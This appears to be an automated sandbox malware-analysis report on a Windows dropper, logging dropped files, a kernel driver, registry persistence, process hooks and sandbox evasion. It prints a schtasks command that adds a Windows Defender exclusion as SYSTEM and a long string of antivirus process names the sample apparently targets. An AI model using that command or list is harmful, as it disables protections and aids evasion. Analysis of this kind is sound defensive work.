Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Section loaded: tbcore3u.dll

Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\Documents\7tqorj.exe

File written: C:\Users\Public\Music\destopbak.ini

Jump to behavior

Source: 2749837485743-7684385786.05.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: 2749837485743-7684385786.05.exe

Static file information: File size 30885376 > 1048576

Source: 2749837485743-7684385786.05.exe

Static PE information: Raw size of .data is bigger than: 0x100000 < 0x1d59800

Source: 2749837485743-7684385786.05.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: 7tqorj.exe, 00000007.00000003.2996806877.0000000003DF5000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000000.3231942330.0000000000818000.00000002.00000001.01000000.0000000A.sdmp, qNHTRl.exe, 00000029.00000002.3974096854.0000000000818000.00000002.00000001.01000000.0000000A.sdmp, qNHTRl.exe, 00000029.00000002.3974221880.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 0000002A.00000002.3271497279.0000000000818000.00000002.00000001.01000000.0000000A.sdmp, qNHTRl.exe, 0000002A.00000000.3255146403.0000000000818000.00000002.00000001.01000000.0000000A.sdmp, NroRNr.exe, 0000002B.00000002.3272775080.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmp, NroRNr.exe, 0000002B.00000000.3258989374.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmp, NroRNr.exe, 0000002E.00000000.3388721194.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmp, NroRNr.exe, 0000002E.00000002.3399267881.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmp, qNHTRl.exe, 0000002F.00000000.3395908790.0000000000818000.00000002.00000001.01000000.0000000A.sdmp, qNHTRl.exe, 0000002F.00000002.3402992961.0000000000818000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source:	Binary string: R:\Everest\Tree\bin\WatersPrintCaptureProxy.pdb source: 2749837485743-7684385786.05.exe
Source:	Binary string: y:\avsdk5\user\make\build\public\64-bit\vseamps.pdb source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe, 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 7tqorj.exe, 00000005.00000000.2712564497.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 7tqorj.exe, 00000006.00000000.2722446315.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 7tqorj.exe, 00000006.00000002.2727976370.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 7tqorj.exe, 00000007.00000000.2792322207.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 7tqorj.exe.0.dr

Source: C:\Users\user\Documents\7tqorj.exe

Code function: 5_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

5_2_000000014000F000

Source: initial sample

Static PE information: section where entry point is pointing to: .mo:

Source: tbcore3U.dll.7.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.7.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.7.dr	Static PE information: section name: .mo:
Source: tbcore3U.dll.41.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.41.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.41.dr	Static PE information: section name: .mo:

Source: C:\Program Files (x86)\2U36F\NroRNr.exe

Code function: 43_2_00FA2691 push ecx; ret

43_2_00FA26A4

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	File created: C:\Users\user\Documents\vselog.dll			Jump to dropped file
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	File created: C:\Users\user\Documents\7tqorj.exe			Jump to dropped file

Sample is not signed and drops a device driver

Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior

Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	File created: C:\Windows\System32\drivers\189atohci.sys	Jump to dropped file
Source: C:\Users\user\Documents\7tqorj.exe	File created: C:\Program Files (x86)\qNHTRl\tbcore3U.dll	Jump to dropped file
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	File created: C:\Program Files (x86)\2U36F\NroRNr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	File created: C:\Users\user\Documents\vselog.dll	Jump to dropped file
Source: C:\Users\user\Documents\7tqorj.exe	File created: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	File created: C:\Users\user\Documents\7tqorj.exe	Jump to dropped file
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	File created: C:\Program Files (x86)\2U36F\tbcore3U.dll	Jump to dropped file

Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Key value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron Groupfenzhu			Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Key value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron Groupfenzhu			Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"

Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe

Registry key created: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron

Jump to behavior

Source: C:\Users\user\Documents\7tqorj.exe

5_2_0000000140001520

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Documents\7tqorj.exe	Memory written: PID: 2544 base: 7FFDB4590008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Memory written: PID: 2544 base: 7FFDB442D9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Memory written: PID: 504 base: 7FFDB4590008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Memory written: PID: 504 base: 7FFDB442D9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Memory written: PID: 3476 base: 7FFDB4590008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Memory written: PID: 3476 base: 7FFDB442D9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Memory written: PID: 5052 base: D00005 value: E9 8B 2F 68 76	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Memory written: PID: 5052 base: 77382F90 value: E9 7A D0 97 89	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Memory written: PID: 5052 base: D20005 value: E9 8B 2F 66 76	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Memory written: PID: 5052 base: 77382F90 value: E9 7A D0 99 89	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Memory written: PID: 5032 base: A30005 value: E9 8B 2F 95 76
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Memory written: PID: 5032 base: 77382F90 value: E9 7A D0 6A 89
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	Memory written: PID: 4800 base: F90005 value: E9 8B 2F 3F 76
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	Memory written: PID: 4800 base: 77382F90 value: E9 7A D0 C0 89
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	Memory written: PID: 7136 base: 1220005 value: E9 8B 2F 16 76
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	Memory written: PID: 7136 base: 77382F90 value: E9 7A D0 E9 89
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Memory written: PID: 2104 base: 6F0005 value: E9 8B 2F C9 76
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Memory written: PID: 2104 base: 77382F90 value: E9 7A D0 36 89

Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	API/Special instruction interceptor: Address: 6C8C87AA
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	API/Special instruction interceptor: Address: 6C893E38
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	API/Special instruction interceptor: Address: 6C999F9E
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	API/Special instruction interceptor: Address: 6C91C0AF
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	API/Special instruction interceptor: Address: 6C89FFCB
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	API/Special instruction interceptor: Address: 6C965F8C
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	API/Special instruction interceptor: Address: 340FE84
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	API/Special instruction interceptor: Address: 34140CE
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	API/Special instruction interceptor: Address: 34FC5E8
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	API/Special instruction interceptor: Address: 33E10CD
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	API/Special instruction interceptor: Address: 3815654
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	API/Special instruction interceptor: Address: 34AA3BD
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	API/Special instruction interceptor: Address: 3445D5F
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	API/Special instruction interceptor: Address: 6C91183C
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	API/Special instruction interceptor: Address: 6C98CBDE
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	API/Special instruction interceptor: Address: 6C98B056
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	API/Special instruction interceptor: Address: 6C13A03F
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	API/Special instruction interceptor: Address: 6C24B056
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	API/Special instruction interceptor: Address: 6C1887AA
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	API/Special instruction interceptor: Address: 6C155143
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	API/Special instruction interceptor: Address: 6C90F839
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	API/Special instruction interceptor: Address: 6C878B19
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	API/Special instruction interceptor: Address: 6C8C87B1
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	API/Special instruction interceptor: Address: 6C9C6565
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	API/Special instruction interceptor: Address: 6C19080B
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	API/Special instruction interceptor: Address: 6C192089
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	API/Special instruction interceptor: Address: 6C286565
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	API/Special instruction interceptor: Address: 6C1D183C
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	API/Special instruction interceptor: Address: 6C1390FC
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	API/Special instruction interceptor: Address: 6C8790FC
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	API/Special instruction interceptor: Address: 6C97A702
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	API/Special instruction interceptor: Address: 6C8BF34F
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	API/Special instruction interceptor: Address: 6C15FFCB
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	API/Special instruction interceptor: Address: 6C297912
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	API/Special instruction interceptor: Address: 6C1887B1
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	API/Special instruction interceptor: Address: 6C9A6E74
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	API/Special instruction interceptor: Address: 6C8D2089

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: {4E062DDA-444A-A2A8-84CE-E105F66A5AB3}SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEMCONSENTPROMPTBEHAVIORADMINSOFTWARE\PERFRPOOLSOFTWARE\PPFR49/56/235/24;9161POSTDATAC:\WINDOWS\SYSWOW64\DRIVERS\189ATOHCI.SYS360SAFE.EXE360SD.EXE360RP.EXE360RPS.EXESRAGENT.EXE360TRAY.EXEZHUDONGFANGYU.EXEKANKAN.EXESUPERKILLER.EXELIVEUPDATE360.EXEMODULEUPDATE.EXEFILESMASHER.EXEAGREEMENTVIEWER.EXESOFTMGRLITE.EXE360LEAKFIXER.EXE360SDRUN.EXE360SDUPD.EXE360FILEGUARD.EXEDEP360.EXEDUMPUPER.EXEDSMAIN.EXEDSMAIN64.EXEFIRSTAIDBOX.EXECHECKSM.EXEHIPSMAIN.EXEHIPSDAEMON.EXEHIPSTRAY.EXEHRUPDATE.EXEHIPSLOG.EXENETFLOW.EXEAUTORUNS.EXEUSYSDIAG.EXEWSCTRLSVC.EXEWSCTRL.EXEKXEMAIN.EXEKXESCORE.EXEKSCAN.EXEKXECENTER.EXEKXETRAY.EXEKDINFOMGR.EXEKISLIVE.EXEKNEWVIP.EXEKSOFTPURIFIER.EXEKTRASHAUTOCLEAN.EXEKAUTHORITYVIEW.EXETQCLIENT.EXETQEDRNAME.EXETQSAFEUI.EXETQTRAY.EXETRANTORAGENT.EXETQDEFENDER.EXETQUPDATEUI.EXETQWATERMARK.EXEDLPAPPDATA.EXENACLDIS.EXEMSMPENG.EXEMPCMDRUN.EXELDSHELPER.EXELDSSECURITY.EXELDSSECURITYAIDER.EXECOMPUTERZTRAY.EXECOMPUTERCENTER.EXEGUARDHP.EXECOMPUTERZ_CN.EXECOMPUTERZSERVICE.EXECOMPUTERZSERVICE_X64.EXEHDW_DISK_SCAN.EXECOMPUTERZMONHELPER.EXEDRVMGR.EXEWEB_HOST.EXE2345SAFECENTERSVC.EXE2345RTPROTECT.EXE2345SAFESVC.EXE2345MPCSAFE.EXE2345SAFETRAY.EXE2345SAFEUPDATE.EXE2345VIRUSSCAN.EXE2345MANUUPDATE.EXE2345ADRTPROTECT.EXE2345AUTHORITYPROTECT.EXE2345EXTSHELL.EXE2345EXTSHELL64.EXE2345FILESHRE.EXE2345LEAKFIXER.EXE2345LSPFIX.EXE2345PCSAFEBOOTASSISTANT.EXE2345RTPROTECTCENTER.EXE2345SHELLPRO.EXE2345SYSDOCTOR.EXELENOVOPCMANAGERSERVICE.EXELENOVOPCMANAGER.EXELAVSERVICE.EXELENOVOTRAY.EXELNVSVCFDN.EXEWSCTRL7.EXEWSCTRL10.EXEWSCTRL11.EXELENOVOAPPUPDATE.EXELENOVOAPPSTORE.EXEDESKTOPASSISTANTAPP.EXEDESKTOPASSISTANT.EXELENOVOMONITORMANAGER.EXELENOVOOKM.EXELEASHIVE.EXESTARTUPMANAGER.EXEWSPLUGINHOST.EXEWSPLUGINHOST64.EXECRASHPAD_HANDLER.EXESEARCHuser.EXELISFSERVICE.EXELSF.EXEAPPVANT.EXELENOVOINTERNETSOFTWAREFRAMEWORK.EXEEMDRIVERASSIST.EXELEAPPOM.EXEHOTFIXPLATFORM.EXEMSPCMANAGER.EXEMSPCMANAGERSERVICE.EXEAVP.EXEAVPUI.EXEAVASTSVC.EXEASWTOOLSSVC.EXEASWIDSAGENT.EXEWSC_PROXY.EXEAVASTUI.EXEAVIRA.SPOTLIGHT.SERVICE.EXEENDPOINTPROTECTION.EXESENTRYEYE.EXEAVIRA.SPOTLIGHT.COMMON.UPDATER.EXEAVIRA.SPOTLIGHT.FALLBACKUPDATER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.EXEAVIRA.SPOTLIGHT.SYSTRAY.APPLICATION.EXEAVIRA.OPTIMIZERHOST.EXEAVIRA.SPOTLIGHT.BOOTSTRAPPER.EXEAVIRA.SPOTLIGHT.SERVICE.WORKER.EXEAVIRA.SPOTLIGHT.COMMON.UPDATERTRACKER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.MESSAGING.EXEAVIRA.SPOTLIGHT.UI.ADMINISTRATIVERIGHTSPROVIDER.EXEMFEMMS.EXEMFEVTPS.EXEMCAPEXE.EXEMCSHIELD.EXEMCUICNT.EXEMFEAVSVC.EXENISSRV.EXESECURITYHEALTHSYSTRAY.EXEKWSPROTECT64.EXEQMDL.EXEQMPERSONALCENTER.EXEQQPCPATCH.EXEQQPCREALTIMESPEEDUP.EXEQQPCRTP.EXEQQPCTRAY.EXEQQREPAIR.EXEQQPCMGRUPDATE.EXEKSAFETRAY.EXEMPCOPYACCELERATOR.EXEUNTHREAT.EXEK7TSECURITY.EXEAD-WATCH.EXEPSAFESYSTRAY.EXEVSSERV.EXEREMUPD.EXERTVSCAN.EXEASHDISP.EXEAVCENTER.EXETMBMSRV.EXEKNSDTRAY.EXEV3SVC.EXEMSSECESS.EXEQUHLPSVC.EXERAV